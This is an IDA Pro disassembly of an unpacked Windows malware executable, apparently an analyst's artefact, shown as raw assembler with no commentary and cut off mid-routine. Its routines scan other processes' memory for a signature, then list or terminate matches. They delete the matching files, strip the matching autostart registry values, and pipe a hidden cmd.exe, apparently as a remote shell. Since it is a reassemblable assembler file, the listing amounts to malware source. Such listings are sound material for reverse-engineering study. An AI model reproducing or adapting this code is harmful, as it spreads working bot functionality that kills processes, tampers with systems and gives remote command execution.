;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 237B31F04EDB1B0A556D4ACC5E67F22B
; File Name : u:\work\237b31f04edb1b0a556d4acc5e67f22b_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00016000 ( 90112.)
; Section size in file : 00016000 ( 90112.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401146+31�p
; sub_401146+43�p ...
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = byte ptr -218h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 268h
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_40101A
; ---------------------------------------------------------------------------
loc_401013: ; CODE XREF: sub_401000+13C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40101A: ; CODE XREF: sub_401000+11�j
mov eax, [ebp+var_4]
cmp off_418000[eax*4], 0
jz loc_401141
mov eax, [ebp+var_4]
push off_418000[eax*4]
lea eax, [ebp+var_260]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_260]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_110]
push eax
push 3
push 0
lea eax, [ebp+var_260]
push eax
push [ebp+arg_0]
call ds:dword_417008 ; RegOpenKeyExA
and [ebp+var_220], 0
jmp short loc_401081
; ---------------------------------------------------------------------------
loc_401074: ; CODE XREF: sub_401000:loc_40112B�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_401081: ; CODE XREF: sub_401000+72�j
mov [ebp+var_21C], 104h
mov [ebp+var_224], 104h
lea eax, [ebp+var_224]
push eax
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_114]
push eax
push 0
lea eax, [ebp+var_21C]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_220]
push [ebp+var_110]
call ds:dword_417000 ; RegEnumValueA
mov [ebp+var_264], eax
cmp [ebp+var_264], 0
jz short loc_4010DD
jmp short loc_401130
; ---------------------------------------------------------------------------
loc_4010DD: ; CODE XREF: sub_401000+D9�j
cmp [ebp+var_114], 1
jnz short loc_40112B
push [ebp+arg_4]
push [ebp+var_224]
lea eax, [ebp+var_10C]
push eax
call sub_407ACA
add esp, 0Ch
mov [ebp+var_268], eax
cmp [ebp+var_268], 0
jz short loc_40112B
lea eax, [ebp+var_218]
push eax
push [ebp+var_110]
call ds:dword_417004 ; RegDeleteValueA
test eax, eax
jnz short loc_40112B
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40112B: ; CODE XREF: sub_401000+E4�j
; sub_401000+10B�j ...
jmp loc_401074
; ---------------------------------------------------------------------------
loc_401130: ; CODE XREF: sub_401000+DB�j
push [ebp+var_110]
call ds:dword_417028 ; RegCloseKey
jmp loc_401013
; ---------------------------------------------------------------------------
loc_401141: ; CODE XREF: sub_401000+25�j
mov eax, [ebp+var_8]
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401146 proc near ; CODE XREF: sub_401244+459�p
; sub_40A9CF+A72�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push 80h
push [ebp+arg_0]
call ds:dword_4170A8 ; SetFileAttributesA
test eax, eax
jnz short loc_401166
jmp locret_401242
; ---------------------------------------------------------------------------
loc_401166: ; CODE XREF: sub_401146+19�j
push [ebp+arg_0]
call ds:dword_4170AC ; DeleteFileA
push [ebp+arg_0]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov [ebp+var_4], eax
push [ebp+arg_0]
push 80000002h
call sub_401000
pop ecx
pop ecx
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jnz locret_401242
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_108]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_10C], eax
jmp short loc_4011DB
; ---------------------------------------------------------------------------
loc_4011CE: ; CODE XREF: sub_401146:loc_40121A�j
mov eax, [ebp+var_10C]
dec eax
mov [ebp+var_10C], eax
loc_4011DB: ; CODE XREF: sub_401146+86�j
cmp [ebp+var_10C], 0
jz short loc_40121C
mov eax, [ebp+arg_0]
add eax, [ebp+var_10C]
movsx eax, byte ptr [eax-1]
cmp eax, 5Ch
jnz short loc_40121A
push 104h
mov eax, [ebp+var_10C]
lea eax, [ebp+eax+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_40121C
; ---------------------------------------------------------------------------
loc_40121A: ; CODE XREF: sub_401146+AE�j
jmp short loc_4011CE
; ---------------------------------------------------------------------------
loc_40121C: ; CODE XREF: sub_401146+9C�j
; sub_401146+D2�j
lea eax, [ebp+var_108]
push eax
push 80000001h
call sub_401000
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
push 80000002h
call sub_401000
pop ecx
pop ecx
locret_401242: ; CODE XREF: sub_401146+1B�j
; sub_401146+56�j
leave
retn
sub_401146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401244 proc near ; DATA XREF: sub_4017AA+9D�o
var_3E8 = dword ptr -3E8h
var_3E4 = byte ptr -3E4h
var_3E0 = dword ptr -3E0h
var_3DC = dword ptr -3DCh
var_3D8 = dword ptr -3D8h
var_3D4 = dword ptr -3D4h
var_3D0 = dword ptr -3D0h
var_3CC = byte ptr -3CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = byte ptr -2A8h
var_2A7 = dword ptr -2A7h
var_2A3 = byte ptr -2A3h
var_1A3 = byte ptr -1A3h
var_B = byte ptr -0Bh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3E8h
push esi
push edi
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2AC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_40129D
lea eax, [ebp+var_2A3]
push eax
mov eax, [ebp+var_2AC]
push dword ptr [eax]
push offset dword_418144
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_40129D: ; CODE XREF: sub_401244+34�j
call sub_406041
mov [ebp+var_2B4], eax
cmp [ebp+var_2B4], 0
jnz short loc_4012C4
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4017A4
; ---------------------------------------------------------------------------
loc_4012C4: ; CODE XREF: sub_401244+6B�j
push 10000h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2B8], eax
and [ebp+var_2BC], 0
and [ebp+var_2B0], 0
jmp short loc_4012F2
; ---------------------------------------------------------------------------
loc_4012E5: ; CODE XREF: sub_401244+E2�j
; sub_401244+12B�j ...
mov eax, [ebp+var_2B0]
inc eax
mov [ebp+var_2B0], eax
loc_4012F2: ; CODE XREF: sub_401244+9F�j
mov eax, [ebp+var_2B4]
mov ecx, [ebp+var_2B0]
cmp ecx, [eax]
jge loc_401710
mov esi, [ebp+var_2B0]
imul esi, 114h
mov eax, [ebp+var_2B4]
mov edi, [eax+4]
call ds:dword_4170E8 ; GetCurrentProcessId
cmp [edi+esi], eax
jnz short loc_401328
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_401328: ; CODE XREF: sub_401244+E0�j
push 104h
lea eax, [ebp+var_3CC]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_3CC]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_401374
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401374: ; CODE XREF: sub_401244+129�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
movzx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
add eax, 11h
push eax
call ds:dword_417094 ; OpenProcess
mov [ebp+var_2C4], eax
cmp [ebp+var_2C4], 0
jnz short loc_4013B7
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_4013B7: ; CODE XREF: sub_401244+16C�j
and [ebp+var_2C0], 0
and [ebp+var_2C8], 0
loc_4013C5: ; CODE XREF: sub_401244:loc_4016FA�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
cmp eax, 10000h
jbe short loc_4013F7
mov [ebp+var_3E8], 10000h
jmp short loc_40141C
; ---------------------------------------------------------------------------
loc_4013F7: ; CODE XREF: sub_401244+1A5�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
mov [ebp+var_3E8], eax
loc_40141C: ; CODE XREF: sub_401244+1B1�j
mov eax, [ebp+var_3E8]
mov [ebp+var_3D0], eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_3D0]
push [ebp+var_2B8]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+4]
add eax, [ebp+var_2C0]
push eax
push [ebp+var_2C4]
call ds:dword_417098 ; ReadProcessMemory
mov [ebp+var_3D4], eax
cmp [ebp+var_3D4], 0
jz loc_4016C5
cmp [ebp+var_2C8], 0
jz loc_4016C5
and [ebp+var_3D8], 0
and [ebp+var_3DC], 0
jmp short loc_4014A4
; ---------------------------------------------------------------------------
loc_401497: ; CODE XREF: sub_401244:loc_4015DB�j
mov eax, [ebp+var_3DC]
inc eax
mov [ebp+var_3DC], eax
loc_4014A4: ; CODE XREF: sub_401244+251�j
mov eax, [ebp+var_2C8]
sub eax, [ebp+var_2A7]
cmp [ebp+var_3DC], eax
ja loc_4015E0
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
add ecx, 20h
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
sub ecx, 20h
cmp eax, ecx
jnz loc_4015DB
loc_401514: ; CODE XREF: sub_401244+290�j
; sub_401244+2AD�j
mov [ebp+var_3E0], 1
jmp short loc_40152D
; ---------------------------------------------------------------------------
loc_401520: ; CODE XREF: sub_401244:loc_4015D6�j
mov eax, [ebp+var_3E0]
inc eax
mov [ebp+var_3E0], eax
loc_40152D: ; CODE XREF: sub_401244+2DA�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
test eax, eax
jnz short loc_401556
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
mov [ebp+var_3D8], eax
jmp loc_40179F
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_401244+2F9�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
sub ecx, 20h
cmp eax, ecx
jz short loc_4015D6
jmp short loc_4015DB
; ---------------------------------------------------------------------------
loc_4015D6: ; CODE XREF: sub_401244+338�j
; sub_401244+363�j ...
jmp loc_401520
; ---------------------------------------------------------------------------
loc_4015DB: ; CODE XREF: sub_401244+2CA�j
; sub_401244+390�j
jmp loc_401497
; ---------------------------------------------------------------------------
loc_4015E0: ; CODE XREF: sub_401244+272�j
; sub_401244:loc_40179F�j
cmp [ebp+var_3D8], 0
jz loc_4016C5
mov eax, [ebp+var_2BC]
inc eax
mov [ebp+var_2BC], eax
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401675
push 3E8h
call ds:dword_41709C ; Sleep
mov al, [ebp+var_B]
mov [ebp+var_3E4], al
and [ebp+var_B], 0
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_2A3]
push eax
push offset dword_41811C
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 14h
mov al, [ebp+var_3E4]
mov [ebp+var_B], al
jmp short loc_4016A3
; ---------------------------------------------------------------------------
loc_401675: ; CODE XREF: sub_401244+3BF�j
push 0
push [ebp+var_2C4]
call ds:dword_4170A0 ; TerminateProcess
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_401146
pop ecx
loc_4016A3: ; CODE XREF: sub_401244+42F�j
mov eax, [ebp+var_2AC]
cmp dword ptr [eax+4], 0
jz short loc_4016C0
push [ebp+var_2C4]
call ds:dword_4170A4 ; CloseHandle
jmp loc_40179A
; ---------------------------------------------------------------------------
loc_4016C0: ; CODE XREF: sub_401244+469�j
jmp loc_401795
; ---------------------------------------------------------------------------
loc_4016C5: ; CODE XREF: sub_401244+230�j
; sub_401244+23D�j ...
mov eax, [ebp+var_2C0]
add eax, [ebp+var_3D0]
mov [ebp+var_2C0], eax
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov edx, [ebp+var_2C0]
cmp edx, [ecx+eax+8]
jnz short loc_4016FA
jmp short loc_4016FF
; ---------------------------------------------------------------------------
loc_4016FA: ; CODE XREF: sub_401244+4B2�j
jmp loc_4013C5
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: sub_401244+4B4�j
; sub_401244:loc_401795�j
push [ebp+var_2C4]
call ds:dword_4170A4 ; CloseHandle
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401710: ; CODE XREF: sub_401244+BC�j
; sub_401244:loc_40179A�j
push [ebp+var_2B4]
call sub_40636E
pop ecx
push [ebp+var_2B8]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401785
push 3E8h
call ds:dword_41709C ; Sleep
cmp [ebp+var_2BC], 0
jnz short loc_401764
lea eax, [ebp+var_2A3]
push eax
push offset dword_4180F8
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_401785
; ---------------------------------------------------------------------------
loc_401764: ; CODE XREF: sub_401244+501�j
lea eax, [ebp+var_2A3]
push eax
push [ebp+var_2BC]
push offset dword_4180CC
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_401785: ; CODE XREF: sub_401244+4ED�j
; sub_401244+51E�j
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_4017A4
; ---------------------------------------------------------------------------
loc_401795: ; CODE XREF: sub_401244:loc_4016C0�j
jmp loc_4016FF
; ---------------------------------------------------------------------------
loc_40179A: ; CODE XREF: sub_401244+477�j
jmp loc_401710
; ---------------------------------------------------------------------------
loc_40179F: ; CODE XREF: sub_401244+30D�j
jmp loc_4015E0
; ---------------------------------------------------------------------------
loc_4017A4: ; CODE XREF: sub_401244+7B�j
; sub_401244+54F�j
pop edi
pop esi
leave
retn 4
sub_401244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017AA proc near ; CODE XREF: sub_40A9CF+AA1�p
; sub_40A9CF+AD2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_4017C2
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
test eax, eax
jnz short loc_4017C7
loc_4017C2: ; CODE XREF: sub_4017AA+9�j
jmp locret_401854
; ---------------------------------------------------------------------------
loc_4017C7: ; CODE XREF: sub_4017AA+16�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4017DD
jmp short locret_401854
; ---------------------------------------------------------------------------
loc_4017DD: ; CODE XREF: sub_4017AA+2F�j
mov eax, [ebp+var_4]
mov cl, [ebp+arg_8]
mov [eax+4], cl
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+5], eax
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 9
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 109h
push eax
call sub_405F67
pop ecx
pop ecx
movzx eax, [ebp+arg_8]
test eax, eax
jz short loc_401830
mov [ebp+var_8], offset aListing ; "Listing"
jmp short loc_401837
; ---------------------------------------------------------------------------
loc_401830: ; CODE XREF: sub_4017AA+7B�j
mov [ebp+var_8], offset aKilling ; "Killing"
loc_401837: ; CODE XREF: sub_4017AA+84�j
push [ebp+arg_4]
push [ebp+var_8]
push offset dword_418174
push 0
push [ebp+var_4]
push offset sub_401244
call sub_4095A4
add esp, 18h
locret_401854: ; CODE XREF: sub_4017AA:loc_4017C2�j
; sub_4017AA+31�j
leave
retn
sub_4017AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401856 proc near ; CODE XREF: sub_401981+A8�p
; sub_401981+E1�p ...
push ebp
mov ebp, esp
cmp dword_41DE24, 0FFFFFFFFh
jz short loc_40186E
push dword_41DE24
call ds:dword_4170A4 ; CloseHandle
loc_40186E: ; CODE XREF: sub_401856+A�j
cmp dword_41DE18, 0FFFFFFFFh
jz short loc_401883
push dword_41DE18
call ds:dword_4170A4 ; CloseHandle
loc_401883: ; CODE XREF: sub_401856+1F�j
cmp dword_41DE1C, 0FFFFFFFFh
jz short loc_401898
push dword_41DE1C
call ds:dword_4170A4 ; CloseHandle
loc_401898: ; CODE XREF: sub_401856+34�j
cmp dword_41DE20, 0FFFFFFFFh
jz short loc_4018AD
push dword_41DE20
call ds:dword_4170A4 ; CloseHandle
loc_4018AD: ; CODE XREF: sub_401856+49�j
pop ebp
retn
sub_401856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018AF proc near ; CODE XREF: sub_401981+28A�p
; sub_401981+395�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 200h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jnz short loc_4018D4
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401922
loc_4018D4: ; CODE XREF: sub_4018AF+15�j
; sub_4018AF:loc_401920�j
push 32h
call ds:dword_41709C ; Sleep
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jz short loc_4018FE
call sub_416B64 ; clock
sub eax, dword_41DE2C
cmp eax, 1F4h
jb short loc_4018FE
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_4018FE: ; CODE XREF: sub_4018AF+39�j
; sub_4018AF+4B�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401920
call sub_416B64 ; clock
sub eax, dword_41DE2C
cmp eax, 0FAh
jb short loc_401920
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_401920: ; CODE XREF: sub_4018AF+5B�j
; sub_4018AF+6D�j
jmp short loc_4018D4
; ---------------------------------------------------------------------------
loc_401922: ; CODE XREF: sub_4018AF+23�j
; sub_4018AF+4D�j ...
call sub_416B64 ; clock
mov dword_41DE2C, eax
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_401942
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_401957
loc_401942: ; CODE XREF: sub_4018AF+86�j
push offset dword_4181A4
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
jmp short loc_40196E
; ---------------------------------------------------------------------------
loc_401957: ; CODE XREF: sub_4018AF+91�j
push 200h
push [ebp+arg_4]
lea eax, [ebp+var_200]
push eax
call sub_407A56
add esp, 0Ch
loc_40196E: ; CODE XREF: sub_4018AF+A6�j
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
leave
retn
sub_4018AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401981 proc near ; DATA XREF: sub_401D6E+88�o
var_730 = dword ptr -730h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_714 = dword ptr -714h
var_510 = byte ptr -510h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_334 = dword ptr -334h
var_330 = word ptr -330h
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = byte ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = byte ptr -30Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 730h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_714]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
sub eax, 1F4h
mov dword_41DE2C, eax
push 0
lea eax, [ebp+var_30C]
push eax
push 104h
push 0
push offset aCmd_exe ; "cmd.exe"
push 0
call ds:dword_41706C ; SearchPathA
test eax, eax
jnz short loc_4019ED
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_4019ED: ; CODE XREF: sub_401981+57�j
mov [ebp+var_318], 0Ch
mov [ebp+var_310], 1
and [ebp+var_314], 0
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_368]
push eax
lea eax, [ebp+var_364]
push eax
call ds:dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A41
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A41: ; CODE XREF: sub_401981+A6�j
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_36C]
push eax
lea eax, [ebp+var_728]
push eax
call ds:dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A7A
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A7A: ; CODE XREF: sub_401981+DF�j
push 3
push 0
push 0
push offset dword_41DE20
call ds:dword_417074 ; GetCurrentProcess
push eax
push [ebp+var_36C]
call ds:dword_417074 ; GetCurrentProcess
push eax
call ds:dword_4170F0 ; DuplicateHandle
test eax, eax
jnz short loc_401ABB
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401ABB: ; CODE XREF: sub_401981+120�j
push 10h
push 0
lea eax, [ebp+var_724]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 44h
push 0
lea eax, [ebp+var_360]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_360], 44h
mov [ebp+var_334], 101h
and [ebp+var_330], 0
mov eax, [ebp+var_728]
mov [ebp+var_328], eax
mov eax, [ebp+var_368]
mov [ebp+var_324], eax
mov eax, [ebp+var_368]
mov [ebp+var_320], eax
lea eax, [ebp+var_724]
push eax
lea eax, [ebp+var_360]
push eax
push 0
push 0
push 0
push 1
push 0
push 0
push offset byte_41DE30
lea eax, [ebp+var_30C]
push eax
call ds:dword_41707C ; CreateProcessA
test eax, eax
jnz short loc_401B69
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401B69: ; CODE XREF: sub_401981+1CE�j
push [ebp+var_728]
call ds:dword_4170A4 ; CloseHandle
mov eax, [ebp+var_364]
mov dword_41DE24, eax
mov eax, [ebp+var_36C]
mov dword_41DE18, eax
mov eax, [ebp+var_724]
mov dword_41DE1C, eax
push [ebp+var_720]
call ds:dword_4170A4 ; CloseHandle
and [ebp+var_4], 0
and [ebp+var_208], 0
loc_401BAD: ; CODE XREF: sub_401981+2E9�j
; sub_401981+39C�j
mov eax, [ebp+var_714]
cmp dword ptr [eax+4], 0
jz short loc_401BBE
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401BBE: ; CODE XREF: sub_401981+236�j
and [ebp+var_208], 0
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 200h
lea eax, [ebp+var_204]
push eax
push dword_41DE24
call ds:dword_417080 ; PeekNamedPipe
test eax, eax
jnz short loc_401C17
push offset aCouldNotReadDa ; "Could not read data from process."
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C17: ; CODE XREF: sub_401981+27C�j
cmp [ebp+var_4], 0
jnz short loc_401C6F
mov [ebp+var_730], 103h
lea eax, [ebp+var_730]
push eax
push dword_41DE1C
call ds:dword_417084 ; GetExitCodeProcess
test eax, eax
jz short loc_401C62
cmp [ebp+var_730], 103h
jz short loc_401C62
push offset aCmd_exeProcess ; "Cmd.exe process has terminated."
lea eax, [ebp+var_510]
push eax
call sub_40D53F
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C62: ; CODE XREF: sub_401981+2BB�j
; sub_401981+2C7�j
push 0Ah
call ds:dword_41709C ; Sleep
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401C6F: ; CODE XREF: sub_401981+29A�j
and [ebp+var_72C], 0
jmp short loc_401C85
; ---------------------------------------------------------------------------
loc_401C78: ; CODE XREF: sub_401981:loc_401CAF�j
mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_72C], eax
loc_401C85: ; CODE XREF: sub_401981+2F5�j
mov eax, [ebp+var_72C]
cmp eax, [ebp+var_4]
jnb short loc_401CB1
mov eax, [ebp+var_72C]
movsx eax, [ebp+eax+var_204]
cmp eax, 0Ah
jnz short loc_401CAF
mov [ebp+var_208], 1
jmp short loc_401CB1
; ---------------------------------------------------------------------------
loc_401CAF: ; CODE XREF: sub_401981+320�j
jmp short loc_401C78
; ---------------------------------------------------------------------------
loc_401CB1: ; CODE XREF: sub_401981+30D�j
; sub_401981+32C�j
cmp [ebp+var_208], 0
jz short loc_401CC6
mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_4], eax
jmp short loc_401CCD
; ---------------------------------------------------------------------------
loc_401CC6: ; CODE XREF: sub_401981+337�j
mov [ebp+var_4], 200h
